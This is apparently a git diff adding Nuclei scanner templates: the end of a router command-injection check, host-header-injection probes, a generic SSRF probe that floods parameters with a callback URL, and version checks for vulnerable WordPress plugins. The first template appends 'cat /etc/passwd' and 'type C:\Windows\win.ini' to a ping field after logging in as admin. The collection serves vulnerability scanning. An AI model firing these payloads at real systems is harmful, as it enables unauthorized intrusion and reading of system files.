html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 + Content-Type: application/x-www-form-urlencoded + Connection: close + Referer: http://{{Hostname}}/login_pic.asp + Cookie: uid=1234123 + Upgrade-Insecure-Requests: 1 + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 + Content-Type: application/x-www-form-urlencoded + Connection: close + Referer: http://{{Hostname}}/login_pic.asp + Cookie: uid=1234123 + Upgrade-Insecure-Requests: 1 + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + part: body + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/header/host-header-injection_.yaml b/poc/header/host-header-injection_.yaml new file mode 100644 index 0000000000..9166fdec4d --- /dev/null +++ b/poc/header/host-header-injection_.yaml @@ -0,0 +1,32 @@ +id: host-header-injection + +info: + name: Host Header Injection + author: princechaddha + severity: info + description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input. + reference: + - https://portswigger.net/web-security/host-header + - https://portswigger.net/web-security/host-header/exploiting + - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/ + tags: hostheader-injection,generic + +requests: + - method: GET + path: + - "{{BaseURL}}" + + headers: + Host: "{{randstr}}.tld" + + matchers-condition: and + matchers: + - type: word + words: + - '{{randstr}}.tld' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/injection/host-header-injection_.yaml b/poc/injection/host-header-injection_.yaml new file mode 100644 index 0000000000..9166fdec4d --- /dev/null +++ b/poc/injection/host-header-injection_.yaml @@ -0,0 +1,32 @@ +id: host-header-injection + +info: + name: Host Header Injection + author: princechaddha + severity: info + description: HTTP header injection is a general class of web application security vulnerability which occurs when Hypertext Transfer Protocol headers are dynamically generated based on user input. + reference: + - https://portswigger.net/web-security/host-header + - https://portswigger.net/web-security/host-header/exploiting + - https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/ + tags: hostheader-injection,generic + +requests: + - method: GET + path: + - "{{BaseURL}}" + + headers: + Host: "{{randstr}}.tld" + + matchers-condition: and + matchers: + - type: word + words: + - '{{randstr}}.tld' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/other/2d-tag-cloud-widget-by-sujin.yaml b/poc/other/2d-tag-cloud-widget-by-sujin.yaml new file mode 100644 index 0000000000..a53bdeffa3 --- /dev/null +++ b/poc/other/2d-tag-cloud-widget-by-sujin.yaml @@ -0,0 +1,59 @@ +id: 2d-tag-cloud-widget-by-sujin + +info: + name: > + 2D Tag Cloud <= 6.0.2 - Reflected Cross-Site Scripting via add_query_arg Parameter + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dad1be5-ea6c-40fa-bb21-862e7fd8804a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/2d-tag-cloud-widget-by-sujin/" + google-query: inurl:"/wp-content/plugins/2d-tag-cloud-widget-by-sujin/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,2d-tag-cloud-widget-by-sujin,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/2d-tag-cloud-widget-by-sujin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "2d-tag-cloud-widget-by-sujin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.0.2') \ No newline at end of file diff --git a/poc/other/category-icon.yaml b/poc/other/category-icon.yaml new file mode 100644 index 0000000000..9e47aa7837 --- /dev/null +++ b/poc/other/category-icon.yaml @@ -0,0 +1,59 @@ +id: category-icon + +info: + name: > + Category Icon <= 1.0.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1dc4acdc-754f-4ee0-947d-ff0c277e8181?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/category-icon/" + google-query: inurl:"/wp-content/plugins/category-icon/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,category-icon,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/category-icon/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "category-icon" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/other/image-gallery.yaml b/poc/other/image-gallery.yaml new file mode 100644 index 0000000000..4e155aca43 --- /dev/null +++ b/poc/other/image-gallery.yaml @@ -0,0 +1,59 @@ +id: image-gallery + +info: + name: > + ImagePress - Image Gallery <= 1.2.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Deletion and Post Title Update + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bce6872-34d4-4675-bce9-e1197d801bce?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/image-gallery/" + google-query: inurl:"/wp-content/plugins/image-gallery/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,image-gallery,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/image-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "image-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.2') \ No newline at end of file diff --git a/poc/other/mynx-page-builder.yaml b/poc/other/mynx-page-builder.yaml new file mode 100644 index 0000000000..0c2a4bd27d --- /dev/null +++ b/poc/other/mynx-page-builder.yaml @@ -0,0 +1,59 @@ +id: mynx-page-builder + +info: + name: > + Mynx Page Builder <= 0.27.8 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/73a25208-81fe-4337-a344-1c129bd80862?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/mynx-page-builder/" + google-query: inurl:"/wp-content/plugins/mynx-page-builder/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,mynx-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mynx-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mynx-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.27.8') \ No newline at end of file diff --git a/poc/other/paypal-gift-certificate.yaml b/poc/other/paypal-gift-certificate.yaml new file mode 100644 index 0000000000..4c8692e3cf --- /dev/null +++ b/poc/other/paypal-gift-certificate.yaml @@ -0,0 +1,59 @@ +id: paypal-gift-certificate + +info: + name: > + Easy PayPal Gift Certificate <= 1.2.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via wpppgc_plugin_options + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/72880e44-b0e0-47f4-82f0-c36c81091ba8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/paypal-gift-certificate/" + google-query: inurl:"/wp-content/plugins/paypal-gift-certificate/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,paypal-gift-certificate,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/paypal-gift-certificate/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "paypal-gift-certificate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.3') \ No newline at end of file diff --git a/poc/remote_code_execution/bot-for-telegram-on-woocommerce.yaml b/poc/remote_code_execution/bot-for-telegram-on-woocommerce.yaml new file mode 100644 index 0000000000..225f7322be --- /dev/null +++ b/poc/remote_code_execution/bot-for-telegram-on-woocommerce.yaml @@ -0,0 +1,59 @@ +id: bot-for-telegram-on-woocommerce + +info: + name: > + Bot for Telegram on WooCommerce <= 1.2.4 - Authenticated (Subscriber+) Telegram Bot Token Disclosure to Authentication Bypass + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a662c904-ba2e-494c-a603-b22eeeddf43d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bot-for-telegram-on-woocommerce/" + google-query: inurl:"/wp-content/plugins/bot-for-telegram-on-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bot-for-telegram-on-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bot-for-telegram-on-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bot-for-telegram-on-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.4') \ No newline at end of file diff --git a/poc/remote_code_execution/order-attachments-for-woocommerce.yaml b/poc/remote_code_execution/order-attachments-for-woocommerce.yaml new file mode 100644 index 0000000000..f2e2bc712c --- /dev/null +++ b/poc/remote_code_execution/order-attachments-for-woocommerce.yaml @@ -0,0 +1,59 @@ +id: order-attachments-for-woocommerce + +info: + name: > + Order Attachments for WooCommerce 2.0 - 2.4.1 - Missing Authorization to Authenticated (Subscriber+) Limited Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0dfc8957-78b8-4c55-ba95-52d95b086341?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/order-attachments-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/order-attachments-for-woocommerce/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,order-attachments-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/order-attachments-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "order-attachments-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 2.0', '<= 2.4.1') \ No newline at end of file diff --git a/poc/social/dvk-social-sharing.yaml b/poc/social/dvk-social-sharing.yaml new file mode 100644 index 0000000000..278197c61e --- /dev/null +++ b/poc/social/dvk-social-sharing.yaml @@ -0,0 +1,59 @@ +id: dvk-social-sharing + +info: + name: > + Social Sharing (by Danny) <= 1.3.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/619ca4b6-95bb-4c87-b8db-78e6d6b79384?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/dvk-social-sharing/" + google-query: inurl:"/wp-content/plugins/dvk-social-sharing/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,dvk-social-sharing,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/dvk-social-sharing/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "dvk-social-sharing" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.7') \ No newline at end of file diff --git a/poc/ssrf/ssrf-detect.yaml b/poc/ssrf/ssrf-detect.yaml new file mode 100644 index 0000000000..6276c76b83 --- /dev/null +++ b/poc/ssrf/ssrf-detect.yaml @@ -0,0 +1,21 @@ +id: generic-ssrf + +info: + name: generic-ssrf + author: nagli + severity: high + reference: ssrf + tags: ssrf + +requests: + - method: GET + path: + - '{{BaseURL}}http://{{interactsh-url}}' + - '{{BaseURL}}test&access={{interactsh-url}}&remote_url={{interactsh-url}}&admin={{interactsh-url}}&dbg={{interactsh-url}}&debug={{interactsh-url}}&edit={{interactsh-url}}&grant={{interactsh-url}}&test={{interactsh-url}}&alter={{interactsh-url}}&clone={{interactsh-url}}&create={{interactsh-url}}&delete={{interactsh-url}}&disable={{interactsh-url}}&enable={{interactsh-url}}&exec={{interactsh-url}}&execute={{interactsh-url}}&load={{interactsh-url}}&make={{interactsh-url}}&modify={{interactsh-url}}&rename={{interactsh-url}}&reset={{interactsh-url}}&shell={{interactsh-url}}&toggle={{interactsh-url}}&adm={{interactsh-url}}&root={{interactsh-url}}&cfg={{interactsh-url}}&dest={{interactsh-url}}&redirect={{interactsh-url}}&uri={{interactsh-url}}&path={{interactsh-url}}&continue={{interactsh-url}}&url={{interactsh-url}}&window={{interactsh-url}}&next={{interactsh-url}}&data={{interactsh-url}}&reference={{interactsh-url}}&site={{interactsh-url}}&html={{interactsh-url}}&val={{interactsh-url}}&validate={{interactsh-url}}&domain={{interactsh-url}}&callback={{interactsh-url}}&return={{interactsh-url}}&page={{interactsh-url}}&feed={{interactsh-url}}&host={{interactsh-url}}&port={{interactsh-url}}&to={{interactsh-url}}&out={{interactsh-url}}&view={{interactsh-url}}&dir={{interactsh-url}}&show={{interactsh-url}}&navigation={{interactsh-url}}&open={{interactsh-url}}&file={{interactsh-url}}&document={{interactsh-url}}&folder={{interactsh-url}}&pg={{interactsh-url}}&php_path={{interactsh-url}}&style={{interactsh-url}}&doc={{interactsh-url}}&img={{interactsh-url}}&filename={{interactsh-url}}' + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "http" + - "dns"